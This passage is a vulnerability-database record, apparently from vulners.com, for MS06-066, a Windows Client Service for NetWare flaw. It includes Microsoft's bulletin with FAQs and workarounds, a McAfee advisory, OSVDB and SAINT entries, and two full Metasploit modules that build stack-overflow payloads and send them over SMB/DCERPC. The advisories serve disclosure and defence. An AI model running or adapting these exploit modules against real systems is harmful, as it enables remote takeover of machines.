visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected component validates the length of a message before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-046?\r\nBoth vulnerabilities were in the NetWare Client service. However, this update addresses a new vulnerability that was not addressed as part of MS05-046. MS05-046 helps protect against the vulnerability that is discussed in that bulletin, but does not address this new vulnerability. This update replaces MS005-046 on Windows XP Service Pack 2 only. You must install this update and MS05-046 to help protect your system against both vulnerabilities for the other affected platforms.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nNetWare Driver Denial of Service Vulnerability - CVE-2006-4689:\r\n\r\nA denial of service vulnerability exists in Client Service for NetWare (CSNW) that could allow an attacker to send a specially crafted network message to an affected system running the Client Service for NetWare service. An attacker could cause the system to stop responding.\r\n\t\r\nMitigating Factors for NetWare Driver Denial of Service Vulnerability - CVE-2006-4689:\r\n\u2022\t\r\n\r\nWindows XP Home Edition Service Pack 2 and Windows XP Media Center Edition 2005 do not contain the vulnerable component and are not vulnerable to this issue.\r\n\u2022\t\r\n\r\nOn Windows Server 2003 and Windows Server 2003 Service Pack 1 an attacker would need to be an authenticated user with valid logon credentials in order to successfully carry out an attack on an affected system.\r\n\u2022\t\r\n\r\nFor customers who require the affected component. firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nBy default, the Client Service for NetWare is not installed on any affected operating system version. Only customers who manually install this service are likely to be vulnerable to this issue.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for NetWare Driver Denial of Service Vulnerability - CVE-2006-4689:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nNote CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol. Because TCP/IP is the most commonly used protocol, the following workarounds are based on TCP/IP. If protocols such as IPX and SPX are being used, you should also block the appropriate ports for those protocols. For more information about IPX and SPX, visit the following Microsoft Web site.\r\n\u2022\t\r\n\r\nRemove the Client Service for NetWare if you do not need it.\r\n\r\nIf you no longer need the Client Service for NetWare, remove it. To do this, follow these steps.\r\n\r\nWindows XP\r\n\r\n1.\r\n\t\r\n\r\nOpen Network Connections\r\n\r\n2.\r\n\t\r\n\r\nRight-click a local area connection and then click Properties.\r\n\r\n3.\r\n\t\r\n\r\nIn the This connection uses the following items list. click Client Service for NetWare.\r\n\r\n4.\r\n\t\r\n\r\nClick the General tab and then click Uninstall.\r\n\r\n5.\r\n\t\r\n\r\nComplete the removal by following the instructions on the screen.\r\n\r\nWindows 2000\r\n\r\n1.\r\n\t\r\n\r\nLog in as administrator\r\n\r\n2.\r\n\t\r\n\r\nRight-click on My Network Places\r\n\r\n3.\r\n\t\r\n\r\nClick Properties\r\n\r\n4.\r\n\t\r\n\r\nClick Local Area Connection\r\n\r\n5.\r\n\t\r\n\r\nHighlight CSNW and click Uninstall\r\n\r\n6.\r\n\t\r\n\r\nOn the pop up dialog box that displays, click Yes\r\n\r\nImpact of Workaround: Some organizations require the affected component for important functions. Administrators should not remove the affected component unless they fully understand the effect that doing this will have on their environment.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall:\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, visit the following Web site.\r\n\r\nImpact of Workaround: Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below.\r\n\r\nApplications that uses SMB (CIFS)\r\n\r\nApplications that uses mailslots or named pipes (RPC over SMB)\r\n\r\nServer (File and Print Sharing)\r\n\r\nGroup Policy\r\n\r\nNet Logon\r\n\r\nDistributed File System (DFS)\r\n\r\nTerminal Server Licensing\r\n\r\nPrint Spooler\r\n\r\nComputer Browser\r\n\r\nRemote Procedure Call Locator\r\n\r\nFax Service\r\n\r\nIndexing Service\r\n\r\nPerformance Logs and Alerts\r\n\r\nSystems Management Server\r\n\r\nLicense Logging Service\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Windows Firewall, which is included with Windows XP.\r\n\r\nBy default, the Windows Firewall feature in Windows XP and in Windows Server 2003 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Windows Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.Click Start, and then click Control Panel.\r\n\r\n2.Double-click Network Connections and then click Change Windows Firewall settings.\r\n\r\n3.On the General tab, ensure that the On (recommended) value is selected. This will enable the Windows Firewall.\r\n\r\n4.Once the Windows Firewall is enabled, select Don\u2019t allow exceptions to prohibit all incoming traffic.\r\n\r\nNote \u2013 if you want to enable certain programs and services to communicate through the firewall, de-select Don\u2019t allow exceptions and click the Exceptions tab. On the Exception tab, select the programs, protocols, and services you want to enable.\r\n\r\n.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature.\r\n\r\nYou can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, block the affected ports by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for NetWare Driver Denial of Service Vulnerability - CVE-2006-4689:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding and automatically restart. During that time, the server cannot respond to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Client Service for NetWare.\r\n\r\nWhat is Client Service for NetWare?\r\nThe Client Service for NetWare (CSNW) allows the client to access NetWare file, print, and directory services. Both Microsoft and Novell provide a client service for this purpose: Microsoft Client Service for NetWare and Novell Client for Microsoft Windows XP, respectively. This vulnerability affects the Microsoft Client Service for NetWare. For more information about NetWare access, visit the following Web site. This service is also called Gateway Service for NetWare on Windows 2000 Server.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nWho could exploit the vulnerability?\r\nOn Windows 2000 and Windows Service Pack 2, any anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability. On Windows Server 2003 an attacker would need valid logon credentials in order to successfully exploit the vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could try to exploit the vulnerability directly over a network by creating a series of specially crafted network messages and sending them to an affected system. The messages could then cause the affected system to stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll systems that have the Client Service for NetWare installed (also known as the Gateway Service for NetWare), are primarily at risk from this vulnerability. By default, this component is not installed on any affected operating system version. Only customers who manually install this component are likely to be vulnerable to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected component validates the length of a message before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-046?\r\nBoth vulnerabilities were in the NetWare Client service. However, this update addresses a new vulnerability that was not addressed as part of MS05-046. MS05-046 helps protect against the vulnerability that is discussed in that bulletin, but does not address this new vulnerability. This update replaces MS005-046 on Windows XP Service Pack 2 only. You must install this update and MS05-046 to help protect your system against both vulnerabilities for the other affected platforms.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nPeter Winter-Smith of NGS Software for reporting the Client Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688.\r\n\u2022\t\r\n\r\nSam Arun Raj of McAfee for reporting the Client Service for NetWare Memory Corruption Vulnerability (CVE-2006-4688) and the Client Service for the NetWare Driver DoS Vulnerability (CVE-2006-4689).\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (November 14, 2006): Bulletin published.", "edition": 1, "modified": "2006-11-14T00:00:00", "published": "2006-11-14T00:00:00", "id": "SECURITYVULNS:DOC:15057", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15057", "title": "Microsoft Security Bulletin MS06-066 Vulnerabilities in Client Service for NetWare Could Allow Remote Code Execution (923980)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-4689", "CVE-2006-4688"], "description": "\r\nMcAfee, Inc.\r\nMcAfee(r) Avert(r) Labs Security Advisory\r\nPublic Release Date: 2006-11-16\r\n\r\nVulnerabilities in Client Service for NetWare\r\n\r\nCVE-2006-4688, CVE-2006-4689\r\n________________________________________________________________________\r\n_______\r\n\r\n* Synopsis\r\n\r\nThe Client Service for NetWare (CSNW) allows a Windows client to access\r\nNetWare file, print, and directory services. \r\n\r\nSuccessful exploitation could lead to execution of arbitrary code or\r\ncause the affected system to stop responding. \r\n________________________________________________________________________\r\n_______\r\n\r\n* Vulnerable System or Application\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \r\nMicrosoft Windows XP Service Pack 2\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service\r\nPack 1\r\n\r\n________________________________________________________________________\r\n_______\r\n\r\n* Vulnerability Information\r\n\r\nCVE-2006-4688\r\n\r\nA boundary error in Client Service for Netware (CSNW) can be exploited\r\nto cause a buffer overflow via a specially crafted network message sent\r\nto the system. Successful exploitation allows execution of arbitrary\r\ncode and an attacker could remotely take complete control of the\r\naffected system.\r\n\r\nCVE-2006-4689\r\n\r\nA denial of service vulnerability exists in Client Service for NetWare\r\n(CSNW) that could allow an attacker to send a specially crafted network\r\nmessage to an affected system running the Client Service for NetWare\r\nservice. An attacker could cause the system to stop responding and\r\nautomatically restart thus causing the affected system to stop accepting\r\nrequests. \r\n________________________________________________________________________\r\n_______\r\n\r\n* Resolution\r\n\r\nMicrosoft has included fixes for the Client Service for Netware (CSNW)\r\nissues in the November 2006 Security Bulletin MS06-066 for affected\r\nWindows platforms. \r\n________________________________________________________________________\r\n_______\r\n\r\n* Credits\r\n\r\nThese vulnerabilities were discovered by Sam Arun Raj of McAfee Avert\r\nLabs.\r\n\r\n________________________________________________________________________\r\n_______\r\n\r\n* Legal Notice\r\n\r\nCopyright (C) 2006 McAfee, Inc.\r\nThe information contained within this advisory is provided for the\r\nconvenience of McAfee's customers, and may be redistributed provided\r\nthat no fee is charged for distribution and that the advisory is not\r\nmodified in any way. McAfee makes no representations or warranties\r\nregarding the accuracy of the information referenced in this document,\r\nor the suitability of that information for your purposes.\r\n\r\nMcAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,\r\nInc. and/or its affiliated companies in the United States and/or other\r\nCountries. All other registered and unregistered trademarks in this\r\ndocument are the sole property of their respective owners.\r\n\r\n\r\nBest regards,\r\n\r\nDave Marcus, B.A., CCNA, MCSE\r\nSecurity Research and Communications Manager\r\nMcAfee(r) Avert(r) Labs\r\n(443) 321-3771 Office\r\n(443) 668-0048 Mobile\r\nMcAfee Threat Center\r\n<http://www.mcafee.com/us/threat_center/default.asp> \r\nMcAfee Avert Labs Research Blog <http://www.avertlabs.com/research/blog>\r\n\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-11-16T00:00:00", "published": "2006-11-16T00:00:00", "id": "SECURITYVULNS:DOC:15090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15090", "title": "[Full-disclosure] Vulnerabilities in Client Service for NetWare", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-4689"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:22866](https://secuniaresearch.flexerasoftware.com/advisories/22866/)\n[Related OSVDB ID: 30260](https://vulners.com/osvdb/OSVDB:30260)\nMicrosoft Security Bulletin: MS06-066\nMicrosoft Knowledge Base Article: 923980\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0273.html\nFrSIRT Advisory: ADV-2006-4504\n[CVE-2006-4689](https://vulners.com/cve/CVE-2006-4689)\n", "edition": 1, "modified": "2006-11-14T14:49:16", "published": "2006-11-14T14:49:16", "href": "https://vulners.com/osvdb/OSVDB:30261", "id": "OSVDB:30261", "title": "Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-4688"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:22866](https://secuniaresearch.flexerasoftware.com/advisories/22866/)\n[Related OSVDB ID: 30261](https://vulners.com/osvdb/OSVDB:30261)\nMicrosoft Security Bulletin: MS06-066\nMicrosoft Knowledge Base Article: 923980\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0273.html\nISS X-Force ID: 29952\nFrSIRT Advisory: ADV-2006-4504\n[CVE-2006-4688](https://vulners.com/cve/CVE-2006-4688)\n", "edition": 1, "modified": "2006-11-14T14:49:16", "published": "2006-11-14T14:49:16", "href": "https://vulners.com/osvdb/OSVDB:30260", "id": "OSVDB:30260", "title": "Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "description": "Added: 11/16/2006 \nCVE: [CVE-2006-4688](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688>) \nBID: [20984](<http://www.securityfocus.com/bid/20984>) \nOSVDB: [30260](<http://www.osvdb.org/30260>) \n\n\n### Background\n\nThe Client Service for NetWare, also known as the Gateway Service for NetWare, allows Windows users to access NetWare file, print, and directory services. It is available with Microsoft Windows operating systems but is not installed by default. \n\n### Problem\n\nA buffer overflow vulnerability in the Client Service for NetWare allows remote attackers to execute arbitrary commands. On Windows 2000 and XP, the attacker does not need to authenticate in order to exploit this vulnerability. \n\n### Resolution\n\nInstall the update referenced in [Microsoft Security Bulletin 06-066](<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 SP4 if the Client Service for NetWare is installed and running. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 1, "modified": "2006-11-16T00:00:00", "published": "2006-11-16T00:00:00", "id": "SAINT:4287DA17D9C5FFF8AEA6BEEC76D913BB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/microsoft_netware_treename", "type": "saint", "title": "Microsoft Client Service for NetWare tree name buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "description": "Added: 11/16/2006 \nCVE: [CVE-2006-4688](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688>) \nBID: [20984](<http://www.securityfocus.com/bid/20984>) \nOSVDB: [30260](<http://www.osvdb.org/30260>) \n\n\n### Background\n\nThe Client Service for NetWare, also known as the Gateway Service for NetWare, allows Windows users to access NetWare file, print, and directory services. It is available with Microsoft Windows operating systems but is not installed by default. \n\n### Problem\n\nA buffer overflow vulnerability in the Client Service for NetWare allows remote attackers to execute arbitrary commands. On Windows 2000 and XP, the attacker does not need to authenticate in order to exploit this vulnerability. \n\n### Resolution\n\nInstall the update referenced in [Microsoft Security Bulletin 06-066](<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 SP4 if the Client Service for NetWare is installed and running. \n\n### Platforms\n\nWindows 2000 \n \n\n", "edition": 4, "modified": "2006-11-16T00:00:00", "published": "2006-11-16T00:00:00", "id": "SAINT:866F78907B0A26C8C60FB0A96361B13C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_netware_treename", "title": "Microsoft Client Service for NetWare tree name buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "edition": 2, "description": "Added: 11/16/2006 \nCVE: [CVE-2006-4688](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688>) \nBID: [20984](<http://www.securityfocus.com/bid/20984>) \nOSVDB: [30260](<http://www.osvdb.org/30260>) \n\n\n### Background\n\nThe Client Service for NetWare, also known as the Gateway Service for NetWare, allows Windows users to access NetWare file, print, and directory services. It is available with Microsoft Windows operating systems but is not installed by default. \n\n### Problem\n\nA buffer overflow vulnerability in the Client Service for NetWare allows remote attackers to execute arbitrary commands. On Windows 2000 and XP, the attacker does not need to authenticate in order to exploit this vulnerability. \n\n### Resolution\n\nInstall the update referenced in [Microsoft Security Bulletin 06-066](<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS06-066.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 SP4 if the Client Service for NetWare is installed and running. \n\n### Platforms\n\nWindows 2000 \n \n\n", "modified": "2006-11-16T00:00:00", "published": "2006-11-16T00:00:00", "id": "SAINT:BADCBC24BD5102490F42E81092594F98", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_netware_treename", "type": "saint", "title": "Microsoft Client Service for NetWare tree name buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:32", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft Services MS06-066 nwwks.dll", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83029", "href": "https://packetstormsecurity.com/files/83029/Microsoft-Services-MS06-066-nwwks.dll.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Services MS06-066 nwwks.dll', \n'Description' => %q{ \nThis module exploits a stack overflow in the svchost service, when the netware \nclient service is running. \n}, \n'Author' => [ 'pusscat' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-4688'], \n[ 'OSVDB', '30260'], \n[ 'BID', '21023'], \n[ 'MSB', 'MS06-066'], \n \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\", \n'Compat' => \n{ \n# -ws2ord XXX? \n}, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'Windows XP SP2', \n{ \n'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret \n}, \n] \n], \n \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 14 2006')) \n \nregister_options( \n[ \nOptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'nwwks']), \n], self.class) \n \nend \n \ndef exploit \n# [in] [unique] wchar * \n# [in] [unique] wchar * \n# [out] long \n \nofstring = Rex::Text.to_unicode('\\\\\\\\') + rand_text(292) + [ target.ret ].pack('V') + \"\\x00\\x00\" \nstubdata = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") + \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + \"\\x00\\x00\") + \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") + \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") + \nNDR.UnicodeConformantVaryingStringPreBuilt(ofstring) \n \n \n \n \n \nprint_status(\"Connecting to the SMB service...\") \nconnect() \nsmb_login() \n \nhandle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]) \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ndcerpc.call(0x01, stubdata) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nprint_good('Server did not respond, this is expected') \nrescue => e \nif e.to_s =~ /STATUS_PIPE_DISCONNECTED/ \nprint_good('Server disconnected, this is expected') \nelse \nraise e \nend \nelse \nprint_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\") \nend \n \n# Cleanup \nhandler \ndisconnect \n \nif (dcerpc.last_response != nil and \ndcerpc.last_response.stub_data != nil and \ndcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\") \nreturn true \nelse \nreturn false \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83029/ms06_066_nwwks.rb.txt"}, {"lastseen": "2016-12-05T22:13:19", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft Services MS06-066 nwapi32.dll", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82941", "href": "https://packetstormsecurity.com/files/82941/Microsoft-Services-MS06-066-nwapi32.dll.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Egghunter \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Services MS06-066 nwapi32.dll', \n'Description' => %q{ \nXXX \n}, \n'Author' => [ 'pusscat' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-4688'], \n[ 'OSVDB', '30260'], \n[ 'BID', '21023'], \n[ 'MSB', 'MS06-066'], \n \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 296, \n'BadChars' => \"\", \n'Compat' => \n{ \n# -ws2ord XXX? \n}, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'Windows XP SP2', \n{ \n'Ret' => 0x00EBEEEC , \n}, \n] \n], \n \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 14 2006')) \n \nregister_options( \n[ \nOptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'srvsvc']), \n], self.class) \n \nend \n \ndef exploit \n# [in] [unique] wchar * \n# [in] wchar * \n# [in, out] long \n# [out] handle \n \n# Generate the egghunter payload \nhunter = generate_egghunter() \negg = hunter[1] \n#print_status(\"Today, we'll be hunting for 0x#{egg.unpack(\"V\")[0]}\") \n \n# Add giant blocks of guard data before and after the egg \neggdata = \nrand_text(1024) + \negg + \negg + \npayload.encoded + \nrand_text(1024) \n \nbuflen = 295 \nofstring = Rex::Text.to_unicode('\\\\\\\\') + \"\\x90\" + hunter[0] + rand_text(buflen-hunter[0].length) + \n[ target.ret ].pack('V') + \"\\x00\" \n#ofstring = Rex::Text.to_unicode('\\\\\\\\') + payload.encoded + [ target.ret ].pack('V') + \"\\x00\\x00\" \nstubdata = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString(\"\\\\\\\\BBBB\") + \nNDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! \n#NDR.UnicodeConformantVaryingString('\\\\\\\\' + \"A\"*1024 + \"\\x00\") + \nNDR.long(rand(0xffffffff)) + \nNDR.long(rand(0xffffffff)) + \n#NDR.long((ofstring.length * 2) + 0xC) + \neggdata \n \n \n \n \n \nprint_status(\"Connecting to the SMB service...\") \nconnect() \nsmb_login() \n \nhandle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]) \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ndcerpc.call(0x09, stubdata) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nprint_good('Server did not respond, this is expected') \nrescue => e \nif e.to_s =~ /STATUS_PIPE_DISCONNECTED/ \nprint_good('Server disconnected, this is expected') \nelse \nraise e \nend \nelse \nprint_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\") \nend \n \n# Cleanup \nhandler \ndisconnect \n \nif (dcerpc.last_response != nil and \ndcerpc.last_response.stub_data != nil and \ndcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\") \nreturn true \nelse \nreturn false \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82941/ms06_066_nwapi.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T23:42:52", "description": "Microsoft Services MS06-066 nwwks.dll. CVE-2006-4688. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Microsoft Services - nwwks.dll MS06-066", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16369", "href": 